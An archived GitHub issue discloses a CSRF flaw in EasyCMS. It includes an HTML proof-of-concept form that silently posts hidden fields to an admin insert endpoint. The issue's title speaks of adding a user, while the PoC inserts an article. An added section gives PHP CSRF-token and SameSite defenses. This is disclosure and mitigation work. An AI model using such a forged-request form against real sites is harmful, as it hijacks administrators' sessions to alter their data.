This repository has been archived by the owner on Dec 26, 2019. It is now read-only.

There is one CSRF vulnerability that can add the user account #8

Closed
RitaWWang opened this issue Jan 15, 2019 · 0 comments

RitaWWang commented Jan 15, 2019

After the administrator has logged in, open the following page.
PoC:
one.html---add a user

```html
<html>
  <!-- CSRF PoC -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/EasyCMS-master/index.php?s=/admin/articlem/insert/navTabId/listarticle/callbackType/closeCurrent" method="POST">
      <input type="hidden" name="tid" value="62" />
      <input type="hidden" name="title" value="test1" />
      <input type="hidden" name="keyword" value="11" />
      <input type="hidden" name="ispush" value="0" />
      <input type="hidden" name="iscommend" value="1" />
      <input type="hidden" name="isslides" value="0" />
      <input type="hidden" name="islock" value="0" />
      <input type="hidden" name="summary" value="test" />
      <input type="hidden" name="content" value="test" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
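
Every field in the form above is a fixed value, and the administrator's session cookie is attached by the browser automatically, so the request contains nothing a third-party page cannot supply. The following added example (not part of the original issue and not EasyCMS code) shows a synchronizer-token check that rejects such a request; the function names, the `csrf_token` field name, and the use of PHP 7.3+ are assumptions.

```php
<?php
declare(strict_types=1);
// Added example, not EasyCMS code. Names and the csrf_token field are assumptions.

/** Start the session with a SameSite cookie and return its CSRF token. */
function csrf_token(): string
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        // Array form needs PHP 7.3+; Lax keeps the cookie off cross-site POSTs.
        session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
        session_start();
    }
    if (empty($_SESSION['csrf_token'])) {
        // Unpredictable per-session secret that a foreign page cannot read.
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Hidden field to embed in every admin form that changes state. */
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '" />';
}

/** True only when the POST body carries the token stored in the session. */
function csrf_request_is_valid(array $post, array $session): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return is_string($expected) && is_string($supplied)
        && $expected !== ''
        && hash_equals($expected, $supplied); // constant-time comparison
}

// Guard placed at the top of the insert action, before any database write.
if (PHP_SAPI !== 'cli' && ($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    csrf_token(); // makes sure the session is started and a token exists
    if (!csrf_request_is_valid($_POST, $_SESSION)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
}
```

Each legitimate admin form emits `csrf_field()` inside its `<form>` element, so only pages served by the application itself can submit a matching value.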